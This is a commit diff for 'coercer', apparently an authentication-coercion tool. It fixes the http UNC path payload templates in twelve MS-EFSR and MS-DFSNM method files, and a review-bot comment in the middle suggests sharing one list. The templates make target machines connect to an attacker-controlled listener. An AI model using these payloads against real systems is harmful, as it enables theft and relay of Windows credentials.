Fixed #42, Coercing HTTP Authentications did not work properly
p0dalirius committed Oct 4, 2023
1 parent b0cefa9 commit 83a1fd7
Showing 12 changed files with 15 additions and 14 deletions.
2 changes: 1 addition & 1 deletion coercer/methods/MS_DFSNM/NetrDfsAddStdRoot.py
@@ -43,7 +43,7 @@ class NetrDfsAddStdRoot(MSPROTOCOLRPCCALL):
("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00'),
("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\share\\file.txt\x00'),
]

access = {
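Review bot: The `exploit_paths` list in this class is the same four-entry literal that the other eleven sections on this page carry, so correcting one segment of the `http` template meant editing twelve files by hand. Where the list really is identical, define it once beside the shared `MSPROTOCOLRPCCALL` base (for example `DEFAULT_EXPLOIT_PATHS = [...]`) and write `exploit_paths = DEFAULT_EXPLOIT_PATHS` in each method class; `EfsRpcAddUsersToFileEx.py`, the only section with 4 additions and 3 deletions, shows how a hand-kept copy had already drifted from its siblings. The changed `http` entry also carries no explanation of the extra `share` segment, so a one-line comment such as `# http entry needs the extra path segment, see issue #42` above it would save the next maintainer from reverting it. The class body starts and ends outside the hunk, so whether any class needs a different list cannot be confirmed from here.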
2 changes: 1 addition & 1 deletion coercer/methods/MS_DFSNM/NetrDfsRemoveStdRoot.py
@@ -42,7 +42,7 @@ class NetrDfsRemoveStdRoot(MSPROTOCOLRPCCALL):
("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00'),
("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\share\\file.txt\x00'),
]

access = {
2 changes: 1 addition & 1 deletion coercer/methods/MS_EFSR/EfsRpcAddUsersToFile.py
@@ -59,7 +59,7 @@ class EfsRpcAddUsersToFile(MSPROTOCOLRPCCALL):
("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00'),
("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\share\\file.txt\x00'),
]

access = {
7 changes: 4 additions & 3 deletions coercer/methods/MS_EFSR/EfsRpcAddUsersToFileEx.py
@@ -63,9 +63,10 @@ class EfsRpcAddUsersToFileEx(MSPROTOCOLRPCCALL):
"""

exploit_paths = [
("smb", '\\\\{{listener}}\\Share\\file.txt\x00'),
("smb", '\\\\{{listener}}\\Share\\\x00'),
("smb", '\\\\{{listener}}\\Share\x00'),
("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\share\\file.txt\x00'),
]

access = {
2 changes: 1 addition & 1 deletion coercer/methods/MS_EFSR/EfsRpcDecryptFileSrv.py
@@ -41,7 +41,7 @@ class EfsRpcDecryptFileSrv(MSPROTOCOLRPCCALL):
("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00'),
("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\share\\file.txt\x00'),
]

access = {
@@ -52,7 +52,7 @@ class EfsRpcDuplicateEncryptionInfoFile(MSPROTOCOLRPCCALL):
("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00'),
("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\share\\file.txt\x00'),
]

access = {
2 changes: 1 addition & 1 deletion coercer/methods/MS_EFSR/EfsRpcEncryptFileSrv.py
@@ -40,7 +40,7 @@ class EfsRpcEncryptFileSrv(MSPROTOCOLRPCCALL):
("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00'),
("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\share\\file.txt\x00'),
]

access = {
2 changes: 1 addition & 1 deletion coercer/methods/MS_EFSR/EfsRpcFileKeyInfo.py
@@ -41,7 +41,7 @@ class EfsRpcFileKeyInfo(MSPROTOCOLRPCCALL):
("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00'),
("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\share\\file.txt\x00'),
]

access = {
2 changes: 1 addition & 1 deletion coercer/methods/MS_EFSR/EfsRpcOpenFileRaw.py
@@ -41,7 +41,7 @@ class EfsRpcOpenFileRaw(MSPROTOCOLRPCCALL):
("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00'),
("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\share\\file.txt\x00'),
]

access = {
2 changes: 1 addition & 1 deletion coercer/methods/MS_EFSR/EfsRpcQueryRecoveryAgents.py
@@ -40,7 +40,7 @@ class EfsRpcQueryRecoveryAgents(MSPROTOCOLRPCCALL):
("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00'),
("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\share\\file.txt\x00'),
]

access = {
2 changes: 1 addition & 1 deletion coercer/methods/MS_EFSR/EfsRpcQueryUsersOnFile.py
@@ -40,7 +40,7 @@ class EfsRpcQueryUsersOnFile(MSPROTOCOLRPCCALL):
("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00'),
("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\share\\file.txt\x00'),
]

access = {
2 changes: 1 addition & 1 deletion coercer/methods/MS_EFSR/EfsRpcRemoveUsersFromFile.py
@@ -61,7 +61,7 @@ class EfsRpcRemoveUsersFromFile(MSPROTOCOLRPCCALL):
("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00'),
("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\share\\file.txt\x00'),
]

access = {